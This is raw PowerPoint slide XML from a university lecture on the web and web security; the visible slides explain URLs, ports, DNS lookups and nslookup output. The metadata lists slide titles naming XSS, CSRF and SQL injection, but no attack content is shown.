          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="330565" y="4044351"/>
            <a:ext cx="2031635" cy="2741595"/>
            <a:chOff x="406765" y="4191000"/>
            <a:chExt cx="2031635" cy="2741595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Content Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{202D69AE-7DB5-554B-9E14-BFAAC00AAF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>
            <a:xfrm>
              <a:off x="406765" y="4191000"/>
              <a:ext cx="2031635" cy="1338129"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Content Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D3E112-180A-724C-BBA2-F5EA50454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45"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="406765" y="5594465"/>
              <a:ext cx="1993200" cy="13381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81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B0867-D185-FE45-A2C7-4C6E687F5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3A5BB-E95D-C648-9B4A-F34E3E99D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Rate how well you think this recorded lecture worked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Better than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About as well as an in-person class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Less well than an in-person class, but you still learned something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Total waste of time, you didn't learn anything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much time did you spend on this video lecture?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Do you have any questions you’d like me to address in class?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Any other comments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>or feedback?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5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URLs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Unique name for a file: URL (Universal Resource Locator)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.pomona.edu:80/classes/cs105/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0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dirty="0"/>
              <a:t>Clients use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prefix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty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http://www.cs.pomona.edu:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to infer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where the server is (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.cs.pomona.edu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What port it is listening on (80) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What kind (protocol) of server to contact (HTTP)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308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8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98BD-EC11-844B-B2E3-19F3C96BA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Name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7959B-BB23-B145-BB36-CF1C14FFC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Principals are identified by names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for web hosts, typically a domain name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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cs.pomona.edu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Internet hosts are identified by IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used by network layer to route packets between hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The role of DNS is to translate between domain names and IP addresses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1EDCD-BD55-7340-88FD-A3744D855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64" y="5248835"/>
            <a:ext cx="2949312" cy="115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0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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loopback address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762000" y="419100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localhost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770467" y="6042971"/>
            <a:ext cx="335540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lvl="0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pom-nat-84-6.pomona.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B3826C-82C5-DB4B-9C52-756A4877A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252133"/>
            <a:ext cx="473398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www.cs.pomona.edu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134.173.71.56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357446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1058059" y="2443013"/>
            <a:ext cx="5147563" cy="103412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little.cs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.pomona.edu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134.173.66.223</a:t>
            </a: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058059" y="4064000"/>
            <a:ext cx="4044697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18.25.0.23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eecs.mit.edu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Address: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18.25.0.23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2123686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Multiple domain names mapped to multiple IP addresses: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Some valid domain names don’t map to any IP address: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1371600" y="2158917"/>
            <a:ext cx="4480714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rgbClr val="990000"/>
              </a:buClr>
              <a:buSzPct val="60000"/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www.twitter.com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199.16.156.6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199.16.156.70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199.16.156.102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Address: 199.16.156.230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linux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nslookup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twitter.com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Address: 199.16.156.102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199.16.156.230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199.16.156.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Address: 199.16.156.70</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2056021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2557</TotalTime>
  <Words>3042</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>509</Paragraphs>
  <Slides>48</Slides>
  <Notes>20</Notes>
  <HiddenSlides>4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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>Lecture 28: Web and Web Security</vt:lpstr>
      <vt:lpstr>What is the Internet?</vt:lpstr>
      <vt:lpstr>The Big Picture</vt:lpstr>
      <vt:lpstr>Continuing up the Network Stack…</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Domain Name System (DNS)</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings (cont)</vt:lpstr>
      <vt:lpstr>Properties of DNS Mappings (cont)</vt:lpstr>
      <vt:lpstr>Domain Name System (DNS)</vt:lpstr>
      <vt:lpstr>DNS Lookup</vt:lpstr>
      <vt:lpstr>DNS Root Name Servers</vt:lpstr>
      <vt:lpstr>DNS Lookup</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Well-known Ports and Service Names </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP Requests</vt:lpstr>
      <vt:lpstr>HTTP Responses</vt:lpstr>
      <vt:lpstr>Web Content</vt:lpstr>
      <vt:lpstr>Static and Dynamic Content</vt:lpstr>
      <vt:lpstr>Tiny Web Server</vt:lpstr>
      <vt:lpstr>Vulnerabilities by Year</vt:lpstr>
      <vt:lpstr>Vulnerability Occurrence in Applications</vt:lpstr>
      <vt:lpstr>Broken Authentication</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Dynamic Web Pages</vt:lpstr>
      <vt:lpstr>Same Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>SOP Exceptions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS attack vectors</vt:lpstr>
      <vt:lpstr>Example XSS attacks</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Command Injection </vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQLi in the Wild</vt:lpstr>
      <vt:lpstr>Defenses Against SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>So what's the take away…</vt:lpstr>
      <vt:lpstr>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25: Networking (cont'd)</dc:title>
  <dc:creator>Eleanor Birrell</dc:creator>
  <cp:lastModifiedBy>Eleanor Birrell</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-24T15:51:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-28T20:44:23Z</dcterms:modified>
</cp:coreProperties>
</file>